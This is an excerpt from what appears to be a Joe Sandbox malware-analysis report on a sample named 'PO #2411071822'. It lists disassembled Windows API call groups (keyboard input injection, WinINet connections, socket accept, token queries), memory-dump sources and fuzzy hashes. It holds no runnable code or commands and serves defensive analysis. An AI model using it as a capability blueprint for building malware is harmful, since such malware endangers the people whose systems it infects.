                                                                                                              • ScreenToClient.USER32(?,00000002), ref: 0044C574
                                                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0044C5DA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3880355969-0
                                                                                                              • Opcode ID: 7d9ffb65b33ce156c8f6b5d74ddb4ffaeb9b2aad501c8e8749395f179724ee44
                                                                                                              • Instruction ID: cf47c36100eb6be7bea21f4e5ea5175a854b0331794e8d438c5713073a9af294
                                                                                                              • Opcode Fuzzy Hash: 7d9ffb65b33ce156c8f6b5d74ddb4ffaeb9b2aad501c8e8749395f179724ee44
                                                                                                              • Instruction Fuzzy Hash: 61516C75A01204EFDF20DF68C8C0AAE7BB5EB55360F14826AF915DB2A0D774ED41CB98
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0041C462
                                                                                                              • __itow.LIBCMT ref: 0041C49C
                                                                                                                • Part of subcall function 0041C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0041C753
                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0041C505
                                                                                                              • __itow.LIBCMT ref: 0041C55A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$__itow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3379773720-0
                                                                                                              • Opcode ID: 90004d68fdd628e54142db3953c670130aba3c90fdab0286c42a0695965c9af3
                                                                                                              • Instruction ID: f85c9c505552c04053ad8b2132f86c1676a1b7818877f358453c7eb5ecbeb4bc
                                                                                                              • Opcode Fuzzy Hash: 90004d68fdd628e54142db3953c670130aba3c90fdab0286c42a0695965c9af3
                                                                                                              • Instruction Fuzzy Hash: DB41E971A40258BFDF11DF55CC91BEE7BB5AF48704F00002AF605A72C1DB789A85CB95
                                                                                                              APIs
                                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00423966
                                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00423982
                                                                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004239EF
                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00423A4D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0042E742
• GetLastError.KERNEL32(?,00000000), ref: 0042E768
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0042E78D
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0042E7B9
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0044B5D1
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 0044D807
• GetWindowRect.USER32(?,?), ref: 0044D87D
• PtInRect.USER32(?,?,0044ED5A), ref: 0044D88D
• MessageBeep.USER32(00000000), ref: 0044D8FE
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00423AB8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00423AD4
• PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00423B34
• SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00423B92
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00414038
• __isleadbyte_l.LIBCMT ref: 00414066
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00414094
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004140CA
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• GetForegroundWindow.USER32 ref: 00447CB9
  • Part of subcall function 00425F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00425F6F
  • Part of subcall function 00425F55: GetCurrentThreadId.KERNEL32 ref: 00425F76
  • Part of subcall function 00425F55: AttachThreadInput.USER32(00000000,?,0042781F), ref: 00425F7D
• GetCaretPos.USER32(?), ref: 00447CCA
• ClientToScreen.USER32(00000000,?), ref: 00447D03
• GetForegroundWindow.USER32 ref: 00447D09
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
  • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
• GetCursorPos.USER32(?), ref: 0044F211
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0045E4C0,?,?,?,?,?), ref: 0044F226
• GetCursorPos.USER32(?), ref: 0044F270
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0045E4C0,?,?,?), ref: 0044F2A6
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00434358
  • Part of subcall function 004343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00434401
  • Part of subcall function 004343E2: InternetCloseHandle.WININET(00000000), ref: 0043449E
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1463438336-0
                                                                                                              • Opcode ID: a7382739c7f8fc7352bb4fca478582df1c2eda28c810910febab5c9791d9fff8
                                                                                                              • Instruction ID: 3d0147413ff9ce8360c10cac7f240bb1f90bd6dfe9830c26a4be09eadf05ab9c
                                                                                                              • Opcode Fuzzy Hash: a7382739c7f8fc7352bb4fca478582df1c2eda28c810910febab5c9791d9fff8
                                                                                                              • Instruction Fuzzy Hash: 53210431700601BBDB119F608C00FBBB7A9FF8C701F00502FFA1587650D775A8219B99
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00438AE0
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00438AF2
• accept.WSOCK32(00000000,00000000,00000000), ref: 00438AFF
• WSAGetLastError.WSOCK32(00000000), ref: 00438B16
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: 9544b8efd68151e4df971daca25dc3e78887a39212f43e465a319d8bbe6e4bf8
• Instruction ID: 7583de79b351ec56b9626a2f7c1679ce84e9fb74aab3451e4c4c8e8c9fa3517f
• Opcode Fuzzy Hash: 9544b8efd68151e4df971daca25dc3e78887a39212f43e465a319d8bbe6e4bf8
• Instruction Fuzzy Hash: 54219372A001249FC7219F69D885A9EBBECEF49310F00416AF949D7290DB749A418F95
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00448AA6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00448AC0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00448ACE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00448ADC
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: 273d67568b3fa8693b93e29bf80d1440f329b2100dafc511943cc6dd0fb00f49
• Instruction ID: 4ab5c202f37a91538b117be63e85a7443fb7ee502950b893dd92eb201ea9b9cd
• Opcode Fuzzy Hash: 273d67568b3fa8693b93e29bf80d1440f329b2100dafc511943cc6dd0fb00f49
• Instruction Fuzzy Hash: 5411EE31741520AFEB05AB28CC05FBE7798AF85320F14421AF916DB2E1DFB4AC008799
APIs
  • Part of subcall function 00421E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00420ABB,?,?,?,0042187A,00000000,000000EF,00000119,?,?), ref: 00421E77
  • Part of subcall function 00421E68: lstrcpyW.KERNEL32(00000000,?,?,00420ABB,?,?,?,0042187A,00000000,000000EF,00000119,?,?,00000000), ref: 00421E9D
  • Part of subcall function 00421E68: lstrcmpiW.KERNEL32(00000000,?,00420ABB,?,?,?,0042187A,00000000,000000EF,00000119,?,?), ref: 00421ECE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,0042187A,00000000,000000EF,00000119,?,?,00000000), ref: 00420AD4
• lstrcpyW.KERNEL32(00000000,?,?,0042187A,00000000,000000EF,00000119,?,?,00000000), ref: 00420AFA
• lstrcmpiW.KERNEL32(00000002,cdecl,?,0042187A,00000000,000000EF,00000119,?,?,00000000), ref: 00420B2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: f74792fbc6f857df7ea303506b182f35c0879dd219db8c59c05d4ff5bb80c547
• Instruction ID: cfcaa7061dd120ff46fc67bf42f410027a9b507da3c92f9edc9563fe7f84674a
• Opcode Fuzzy Hash: f74792fbc6f857df7ea303506b182f35c0879dd219db8c59c05d4ff5bb80c547
• Instruction Fuzzy Hash: 4C11B436700315AFDB259F64EC05E7A7BA8FF49354B80416BE805CB251EB75E840C7A5
APIs
• _free.LIBCMT ref: 00412FB5
  • Part of subcall function 0040395C: __FF_MSGBANNER.LIBCMT ref: 00403973
  • Part of subcall function 0040395C: __NMSG_WRITE.LIBCMT ref: 0040397A
  • Part of subcall function 0040395C: RtlAllocateHeap.NTDLL(00D30000,00000000,00000001,00000001,00000000,?,?,003FF507,?,0000000E), ref: 0040399F
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 189eead7d7c7ae7eed72af89f38d10c6b6fb49d4f33953477b24ae4707273278
• Instruction ID: 646cd4d30ae140a0ddc015f120d699ff0436103d520498920faf855681a5e590
• Opcode Fuzzy Hash: 189eead7d7c7ae7eed72af89f38d10c6b6fb49d4f33953477b24ae4707273278
• Instruction Fuzzy Hash: E711EE319082119BDB213F719C0469B3F94AF04365F10443FF849E62A1DB7CC9D1969E
APIs
• _memset.LIBCMT ref: 003FEBB2
  • Part of subcall function 003E51AF: _memset.LIBCMT ref: 003E522F
  • Part of subcall function 003E51AF: _wcscpy.LIBCMT ref: 003E5283
  • Part of subcall function 003E51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003E5293
• KillTimer.USER32(?,00000001,?,?), ref: 003FEC07
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003FEC16
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00453C88
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 1d82717f470cb05201464008d32da46d7380a111afc2bd3143f7ac28effc9cec
• Instruction ID: 96c214454cad899d522674900d61c02a2ab5147127d39f390cc697fb846e86f2
• Opcode Fuzzy Hash: 1d82717f470cb05201464008d32da46d7380a111afc2bd3143f7ac28effc9cec
• Instruction Fuzzy Hash: CF21FC719047949FE7339B28C855BE7BFEC9B05309F04049EE78E56292C7B42A84CB56
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004205AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004205C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004205DD
• FreeLibrary.KERNEL32(?), ref: 00420632
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
• Opcode ID: ed6826d488ba2908da9210070b633d99bb56edd2e8120e5f69dc367350ac03cc
• Instruction ID: 055528facf61df5bf1a010bb195613e5f0a8c5d178ce1de46823aebe7eb593f4
• Opcode Fuzzy Hash: ed6826d488ba2908da9210070b633d99bb56edd2e8120e5f69dc367350ac03cc
• Instruction Fuzzy Hash: D621A271B00228EFDB20CF91EC88ADABBF8EF40704F40846EE51692111DBB9EA55DF55
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00426733
• _memset.LIBCMT ref: 00426754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004267A6
• CloseHandle.KERNEL32(00000000), ref: 004267AF
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: 5bb8e1ff8d46ed575816ee31f1b74a1d2eb6bb8698a9f34bd5ff741b49d03bb9
• Instruction ID: e68fe1c351dce33cc1cb96bd88a96f4fc17a192142564ad0b980d423464f106b
• Opcode Fuzzy Hash: 5bb8e1ff8d46ed575816ee31f1b74a1d2eb6bb8698a9f34bd5ff741b49d03bb9
• Instruction Fuzzy Hash: D411A775E012287AE72057A5AC4DFABBABCEF44764F1141AAF904E71D0D2744E808B79
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0041AA79
                                                                                                                • Part of subcall function 0041AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0041AA83
                                                                                                                • Part of subcall function 0041AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0041AA92
                                                                                                                • Part of subcall function 0041AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0041AA99
                                                                                                                • Part of subcall function 0041AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0041AAAF
                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,0041ADE4,?,?), ref: 0041B21B
                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0041B227
                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041B22E
                                                                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 0041B247
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                              • String ID:
                                                                                                              • API String ID: 4217664535-0
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0041B498
                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0041B4AA
                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0041B4C0
                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0041B4DB
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 003FB5A5
                                                                                                              • GetClientRect.USER32(?,?), ref: 0045E69A
                                                                                                              • GetCursorPos.USER32(?), ref: 0045E6A4
                                                                                                              • ScreenToClient.USER32(?,?), ref: 0045E6AF
                                                                                                              Similarity
                                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 4127811313-0
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00427352
                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00427385
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0042739B
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004273A2
                                                                                                              Similarity
                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 2880819207-0
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003FD1BA
                                                                                                              • GetStockObject.GDI32(00000011), ref: 003FD1CE
                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
                                                                                                              Similarity
                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3970641297-0
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 00407A0D: __getptd_noexit.LIBCMT ref: 00407A0E
                                                                                                              • __lock.LIBCMT ref: 0040748F
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004074AC
                                                                                                              • _free.LIBCMT ref: 004074BF
                                                                                                              • InterlockedIncrement.KERNEL32(00D415F0), ref: 004074D7
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2704283638-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003FAFE3
                                                                                                                • Part of subcall function 003FAF83: SelectObject.GDI32(?,00000000), ref: 003FAFF2
                                                                                                                • Part of subcall function 003FAF83: BeginPath.GDI32(?), ref: 003FB009
                                                                                                                • Part of subcall function 003FAF83: SelectObject.GDI32(?,00000000), ref: 003FB033
                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0044EA8E
                                                                                                              • LineTo.GDI32(00000000,?,?), ref: 0044EA9B
                                                                                                              • EndPath.GDI32(00000000), ref: 0044EAAB
                                                                                                              • StrokePath.GDI32(00000000), ref: 0044EAB9
                                                                                                              Similarity
                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                              • String ID:
                                                                                                              • API String ID: 1539411459-0
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0041C84A
                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041C85D
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041C864
                                                                                                              • AttachThreadInput.USER32(00000000), ref: 0041C86B
                                                                                                              Similarity
                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2710830443-0
APIs
• GetCurrentThread.KERNEL32 ref: 0041B0D6
• OpenThreadToken.ADVAPI32(00000000,?,?,?,0041AC9D), ref: 0041B0DD
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0041AC9D), ref: 0041B0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,0041AC9D), ref: 0041B0F1
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
APIs
• GetSysColor.USER32(00000008), ref: 003FB496
• SetTextColor.GDI32(?,000000FF), ref: 003FB4A0
• SetBkMode.GDI32(?,00000001), ref: 003FB4B5
• GetStockObject.GDI32(00000005), ref: 003FB4BD
• GetWindowDC.USER32(?,00000000), ref: 0045DE2B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0045DE38
• GetPixel.GDI32(00000000,?,00000000), ref: 0045DE51
• GetPixel.GDI32(00000000,00000000,?), ref: 0045DE6A
• GetPixel.GDI32(00000000,?,?), ref: 0045DE8A
• ReleaseDC.USER32(?,00000000), ref: 0045DE95
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041B2DF
• UnloadUserProfile.USERENV(?,?), ref: 0041B2EB
• CloseHandle.KERNEL32(?), ref: 0041B2F4
• CloseHandle.KERNEL32(?), ref: 0041B2FC
  • Part of subcall function 0041AB24: GetProcessHeap.KERNEL32(00000000,?,0041A848), ref: 0041AB2B
  • Part of subcall function 0041AB24: HeapFree.KERNEL32(00000000), ref: 0041AB32
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
